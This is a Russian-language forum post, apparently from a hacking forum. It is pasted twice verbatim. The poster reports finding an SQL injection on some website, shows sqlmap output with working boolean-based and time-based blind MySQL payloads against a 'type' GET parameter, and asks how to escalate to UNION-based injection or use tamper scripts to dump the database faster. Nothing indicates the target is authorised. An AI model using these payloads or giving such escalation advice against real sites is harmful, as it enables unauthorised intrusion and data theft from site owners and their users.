Доброго времени суток.
Нашел скулю на сайте
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=3 AND 8506=8506
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: type=3 AND (SELECT 2467 FROM (SELECT(SLEEP(5)))XmTO)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Но каким образом можно разогнать скулю до юнионки?(Union Query), дампить булином или таймом такое себе удовольствие.
Прикрепляю баннер
web application technology: PHP, Nginx
back-end DBMS: MySQL >= 8.0.0
banner: '5.6.16-log'
Искать другой вектор атаки или может быть с помощью тамперов можно будет что-то придумать?
Нашел скулю на сайте
---
Parameter: type (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: type=3 AND 8506=8506
Vector: AND [INFERENCE]
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: type=3 AND (SELECT 2467 FROM (SELECT(SLEEP(5)))XmTO)
Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])
---
Но каким образом можно разогнать скулю до юнионки?(Union Query), дампить булином или таймом такое себе удовольствие.
Прикрепляю баннер
web application technology: PHP, Nginx
back-end DBMS: MySQL >= 8.0.0
banner: '5.6.16-log'
Искать другой вектор атаки или может быть с помощью тамперов можно будет что-то придумать?